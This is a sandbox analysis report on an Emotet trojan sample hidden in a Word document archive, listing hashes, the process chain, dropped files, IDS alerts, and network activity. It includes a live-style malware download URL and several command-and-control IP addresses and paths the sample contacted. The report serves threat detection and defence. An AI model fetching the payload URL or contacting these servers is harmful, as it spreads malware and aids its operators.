File name:

3fa426cf472733da41bb591df605fd6423ec589f.doc.tar.gz

Full analysis: https://app.any.run/tasks/30952b37-683d-4d78-8d30-14be5a7da3b9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: April 15, 2019, 13:13:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, emotet, trojan, feodo, emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: 72F982376596BD4C6F414C6FEC3EB790
SHA1: C84B1BB79BB2A43FED86650A527D0D00E670D228
SHA256: BF100F9D9C39B7F1CB208AFE97FA8DE987AD1313E78139BBFB4A64F2D27DA0FB
SSDEEP: 3072:RaI8G3Q8oCzg2dTjOXtE+jG+8nkCjDWHHN5FHN/19sOavHOS:YI8GA8oCzgMOO+jG+8njjGjFteP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 395.exe (PID: 1472)
      • 395.exe (PID: 3180)
      • soundser.exe (PID: 3524)
      • soundser.exe (PID: 4060)
      • ZP5oMoZ7IddyHIHRCn.exe (PID: 3916)
      • ZP5oMoZ7IddyHIHRCn.exe (PID: 3704)
      • soundser.exe (PID: 1808)
      • soundser.exe (PID: 832)
    • Downloads executable files from the Internet

      • PoWeRsHelL.exe (PID: 2132)
    • Emotet process was detected

      • soundser.exe (PID: 3524)
      • soundser.exe (PID: 1808)
    • EMOTET was detected

      • soundser.exe (PID: 4060)
      • soundser.exe (PID: 832)
    • Connects to CnC server

      • soundser.exe (PID: 4060)
      • soundser.exe (PID: 832)
    • Changes the autorun value in the registry

      • soundser.exe (PID: 4060)
  • SUSPICIOUS

    • Creates files in the user directory

      • PoWeRsHelL.exe (PID: 2132)
    • Executable content was dropped or overwritten

      • PoWeRsHelL.exe (PID: 2132)
      • 395.exe (PID: 3180)
      • ZP5oMoZ7IddyHIHRCn.exe (PID: 3704)
      • soundser.exe (PID: 4060)
    • Starts Microsoft Office Application

      • rundll32.exe (PID: 2616)
    • Application launched itself

      • 395.exe (PID: 1472)
      • soundser.exe (PID: 3524)
      • ZP5oMoZ7IddyHIHRCn.exe (PID: 3916)
      • soundser.exe (PID: 1808)
    • Starts itself from another location

      • 395.exe (PID: 3180)
      • ZP5oMoZ7IddyHIHRCn.exe (PID: 3704)
    • Connects to server without host name

      • soundser.exe (PID: 4060)
      • soundser.exe (PID: 832)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4056)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: 3fa426cf472733da41bb591df605fd6423ec589f
ZipUncompressedSize: 226176
ZipCompressedSize: 123574
ZipCRC: 0xade0edd0
ZipModifyDate: 2019:04:15 07:42:24
ZipCompression: Deflated
ZipBitFlag: 0x0801
ZipRequiredVersion: 20
No data.
All screenshots are available in the full report
Total processes: 47
Monitored processes: 12
Malicious processes: 9
Suspicious processes: 0

Behavior graph

[Behavior graph not reproduced; process nodes in graph order: winrar.exe (no specs), rundll32.exe (no specs), winword.exe (no specs), powershell.exe, 395.exe (no specs), 395.exe, #EMOTET soundser.exe (no specs), #EMOTET soundser.exe, zp5omoz7iddyhihrcn.exe (no specs), zp5omoz7iddyhihrcn.exe, #EMOTET soundser.exe (no specs), #EMOTET soundser.exe; edges are "start" and "drop and start"]

Process information

PID: 2364
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\3fa426cf472733da41bb591df605fd6423ec589f.doc.tar.gz.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID: 2616
CMD: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\3fa426cf472733da41bb591df605fd6423ec589f
Path: C:\Windows\system32\rundll32.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 4056
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\3fa426cf472733da41bb591df605fd6423ec589f"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: rundll32.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2132
CMD: PoWeRsHelL -e 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
Path: C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe
Parent process: WmiPrvSE.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1472
CMD: "C:\Users\admin\395.exe"
Path: C:\Users\admin\395.exe
Parent process: PoWeRsHelL.exe
User: admin
Company: 360.cn
Integrity Level: MEDIUM
Description: 360 FirstAid
Exit code: 0
Version: 1, 0, 0, 1007

PID: 3180
CMD: --4718016d
Path: C:\Users\admin\395.exe
Parent process: 395.exe
User: admin
Company: 360.cn
Integrity Level: MEDIUM
Description: 360 FirstAid
Exit code: 0
Version: 1, 0, 0, 1007

PID: 3524
CMD: "C:\Users\admin\AppData\Local\soundser\soundser.exe"
Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
Parent process: 395.exe
User: admin
Company: 360.cn
Integrity Level: MEDIUM
Description: 360 FirstAid
Exit code: 0
Version: 1, 0, 0, 1007

PID: 4060
CMD: --3ab57678
Path: C:\Users\admin\AppData\Local\soundser\soundser.exe
Parent process: soundser.exe
User: admin
Company: 360.cn
Integrity Level: MEDIUM
Description: 360 FirstAid
Exit code: 0
Version: 1, 0, 0, 1007

PID: 3916
CMD: "C:\Users\admin\AppData\Local\soundser\ZP5oMoZ7IddyHIHRCn.exe"
Path: C:\Users\admin\AppData\Local\soundser\ZP5oMoZ7IddyHIHRCn.exe
Parent process: soundser.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0

PID: 3704
CMD: --ffd11a3c
Path: C:\Users\admin\AppData\Local\soundser\ZP5oMoZ7IddyHIHRCn.exe
Parent process: ZP5oMoZ7IddyHIHRCn.exe
User: admin
Integrity Level: MEDIUM
Exit code: 0
Total events: 2 207
Read events: 1 633
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 4
Suspicious files: 2
Text files: 2
Unknown types: 5

Dropped files

PID: 2364 (WinRAR.exe)
Filename: C:\Users\admin\AppData\Local\Temp\Rar$DRb2364.4349\3fa426cf472733da41bb591df605fd6423ec589f
Type:
MD5:
SHA256:

PID: 4056 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\CVRF383.tmp.cvr
Type:
MD5:
SHA256:

PID: 2132 (PoWeRsHelL.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4AY5WK0M0GBAWPMP526O.temp
Type:
MD5:
SHA256:

PID: 2132 (PoWeRsHelL.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Type: binary
MD5: 131DC75F6D4142CA9244945A91A71E8D
SHA256: F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4

PID: 4056 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Type: text
MD5: AD605576F70A3A7F38A44975FA104C21
SHA256: A1070A8B2F760C27CA0F592848F3121687A7079A3B17121F4A5E5EA763EB6231

PID: 3180 (395.exe)
Filename: C:\Users\admin\AppData\Local\soundser\soundser.exe
Type: executable
MD5: FD17EE6D2138E342B839B812A60A7FD8
SHA256: 65051AB33765A76AEDB7CC10CDBA57870EE98DD3137AD7830C9F68F99071CBB6

PID: 4056 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\3fa426cf472733da41bb591df605fd6423ec589f.LNK
Type: lnk
MD5: 5F9E53F71AE2FEC4D5038A2C37441A84
SHA256: 1B316E4BB8ACD253867CAA936C50F50388BE5FFE6DD7E86F04D61D1983AFBCFD

PID: 4056 (WINWORD.EXE)
Filename: C:\Users\admin\Desktop\~$a426cf472733da41bb591df605fd6423ec589f
Type: pgc
MD5: BD1C97BDFE3083C3BC1F96218596537D
SHA256: 71C86BB6E0DDE6660FC8CD2AEC939B1258E6C6A6967F7AE7CBE6A01B6D564CBA

PID: 2132 (PoWeRsHelL.exe)
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf05a4.TMP
Type: binary
MD5: 131DC75F6D4142CA9244945A91A71E8D
SHA256: F17C463C77B5DA9E795770A82E0A7FB1023023F44397F6E080721E9811B2A0C4

PID: 4056 (WINWORD.EXE)
Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
Type: tlb
MD5: FF13DD8BD032B0A320DA4D948C0E8C4D
SHA256: FDBDF66BDF4C46338CA9C499DE7AE40DE2573F5D951E95CC2AE9CD0C8445C65C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 8
DNS requests: 1
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
4060 | soundser.exe | POST | - | 187.188.166.192:80 | http://187.188.166.192/tpt/raster/ | MX | - | - | malicious
2132 | PoWeRsHelL.exe | GET | 200 | 103.228.112.39:80 | http://garammatka.com/cgi-bin/o569U/ | IN | executable | 135 Kb | suspicious
4060 | soundser.exe | POST | - | 88.215.2.29:80 | http://88.215.2.29/splash/guids/ringin/ | GB | - | - | malicious
4060 | soundser.exe | POST | - | 187.137.162.145:443 | http://187.137.162.145:443/iab/ringin/ringin/merge/ | MX | - | - | malicious
4060 | soundser.exe | POST | - | 65.49.60.163:443 | http://65.49.60.163:443/json/ | US | - | - | malicious
832 | soundser.exe | POST | - | 187.188.166.192:80 | http://187.188.166.192/scripts/symbols/ | MX | - | - | malicious
832 | soundser.exe | POST | - | 88.215.2.29:80 | http://88.215.2.29/xian/prep/ | GB | - | - | malicious
4060 | soundser.exe | POST | 200 | 45.33.35.103:8080 | http://45.33.35.103:8080/health/rtm/ringin/ | US | binary | 90.7 Kb | malicious

("-" marks a column the report left empty.)

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2132 | PoWeRsHelL.exe | 103.228.112.39:80 | garammatka.com | NEXTRA TELESERVICES PVT. LTD. | IN | suspicious
4060 | soundser.exe | 187.137.162.145:443 | - | Uninet S.A. de C.V. | MX | malicious
4060 | soundser.exe | 88.215.2.29:80 | - | Gamma Telecom Holdings Ltd | GB | malicious
4060 | soundser.exe | 187.188.166.192:80 | - | TOTAL PLAY TELECOMUNICACIONES SA DE CV | MX | malicious
832 | soundser.exe | 88.215.2.29:80 | - | Gamma Telecom Holdings Ltd | GB | malicious
4060 | soundser.exe | 45.33.35.103:8080 | - | Linode, LLC | US | malicious
832 | soundser.exe | 187.188.166.192:80 | - | TOTAL PLAY TELECOMUNICACIONES SA DE CV | MX | malicious
4060 | soundser.exe | 65.49.60.163:443 | - | Linode, LLC | US | malicious

("-" marks a connection made directly to an IP address with no domain name.)

DNS requests

Domain | IP | Reputation
garammatka.com | 103.228.112.39 | suspicious

Threats

PID | Process | Class | Message
2132 | PoWeRsHelL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
2132 | PoWeRsHelL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2132 | PoWeRsHelL.exe | Misc activity | ET INFO EXE - Served Attached HTTP
4060 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 8
4060 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
4060 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 23
4060 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
4060 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
4060 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
4060 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 20
14 ETPRO signatures available at the full report
No debug info